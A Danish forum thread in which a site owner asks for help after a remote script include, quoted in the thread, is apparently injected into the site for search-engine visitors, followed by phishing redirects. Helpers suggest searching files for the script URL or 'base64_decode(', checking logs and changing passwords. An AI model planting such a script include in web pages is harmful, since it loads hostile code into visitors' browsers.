Avatar billede Slettet bruger
24. maj 2014 - 11:34 Der er 13 kommentarer og
1 løsning

Mystisk script fryser webside

Hej
Min webside er tilsyneladende blevet hacket eller fjendtligt overtaget, således at når man søger på eks. google og søgeresultatet kommer fra, og man har klikket på det, så kommer siden frem, men alle link på siden er ikke længere aktive. Så man kan ikke rigtig komme videre.

Hvis jeg derimod manuelt skriver sidens navn i webadressefeltet, kommer siden korrekt frem og alle link og funktioner virker ok.

Kildekoden siger, at når der søges via google, at et script har sneget sig ind i koden, dette script:

script src='http://www.buchedan.org/post/ad2.js'></script>

Derimod er scriptet ikke med, når man manuelt skriver sidens navn webadressefeltet.

Er der nogen som har et forslag til hvordan dette er sket og hvordan jeg får det fjernet igen?

mvh. rwj
24. maj 2014 - 14:09 #1
Hent kildekoden ned på din lokal maskine og brug noget lig Notepad++ til at søge filerne igennem efter "buchedan.org/post/ad2.js" eller "base64_decode(".

Hvis der ikke er noget at finde i filerne, så er det tilføjet til din database.

Den bedte procedure er dog at rulle en backup ud.

Jeg kan ikke sige hvordan angrebet er foretaget, da jeg ikke har nogen ide om hvilket OS, miljø (PHP, Python, Ruby, .NET, ren HTML...) og system (egen kode eller et CMS) du køre.

Har du adgang til system logs?
Avatar billede Slettet bruger
24. maj 2014 - 14:18 #2
Hej

Tak for svar, og det lyder som en godt idé med at hente koderne og søge på min lokalemaskine, så det gør jeg.

Jeg burde vel have afgang til system log, men er lidt i tvivl om hvad du mener.

Men jeg prøver dit forslag og vender retur.

mvh. rwj
24. maj 2014 - 14:32 #3
system logs = error, access, application... log filer, som måske kan afsløre hvordan angrebet er foregået.
Avatar billede Slettet bruger
24. maj 2014 - 14:42 #4
Ok, jeg bruger SharePoint Designer og der er en logfunktion, og den melder ikke om nogen fejl. Så der lærte jeg lidt lidt, tak:-)

Jeg har været igennem alle koderne og databasen uden af finde henvisninger til dette script, så nu er jeg igen totalt blankt.

Er det ikke mærkeligt, at hvis man ikke bruger søgemaskine men taster webadressen ind manuelt, så er der ingen problemer, det er det kun når man bruger søgemaskine.

Kan man forestille sig, at scriptet kommer på ifm med søgemaskinen?

Jeg har ikke megen forstand på dette, sorry:-)

mvh. rwj
Avatar billede Slettet bruger
24. maj 2014 - 14:48 #5
glemt af oplyse, at problemet kun opstår i Crome, Firefox, Safari og Opera, men derimod ikke i IE, hvis det har nogen betydning eller opklaring for sagen.
Avatar billede claes57 Ekspert
24. maj 2014 - 15:23 #6
sker det også fra andre maskiner? eller er fejlen på din maskine.
Avatar billede Slettet bruger
24. maj 2014 - 16:35 #7
Ja, jeg fik det af vide af flere, så det er ikke kun hos mig:-)

mvh. rwj
Avatar billede claes57 Ekspert
24. maj 2014 - 18:45 #8
Så er vi tilbage ved #1. Uden link til side og/eller oplysninger om kildekoden, så er det rent gætværk.
Avatar billede Slettet bruger
24. maj 2014 - 19:28 #9
Helt klart, det er umuligt at komme videre uden webadressen, og den er her:

www.design-klip.dk

fortsat god aften.

mvh. rwj
Avatar billede Slettet bruger
25. maj 2014 - 14:56 #10
nu har omtalte side også fået en besynderlige omdirigering til en phishingside. Kun første gang, prøver man anden gang, så kommer siden frem.

Nogen forslag til løsning af dette problem?

mvh. rwj
Avatar billede claes57 Ekspert
25. maj 2014 - 15:03 #11
Start med at skifte adgangskode. Og så må du igennem siden opsætning og database manuelt, og fjerne alt du ikke selv står inde for.
Avatar billede Slettet bruger
25. maj 2014 - 15:09 #12
ok, det må jeg så prøve, tak indtil videre, jeg vender tilbage.

mvh. rwj
Avatar billede Slettet bruger
25. maj 2014 - 18:04 #13
Jeg har prøvet nogle virus programmer, men har intet fundet.

Har efterfølgnede opdaget, at siden er blevet kapret og puttet i en andens ramme, og derfor er linkene døde.

Jeg har prøvet flere forslag på diverse sider hvordan man undgå af blive kapret og lagt i en anden ramme, men ingen virker.

Er der nogen her som har et forslag?

mvh. rwj
Avatar billede Slettet bruger
09. juni 2014 - 08:43 #14
lukker, men god sommer til alle eksperter:-)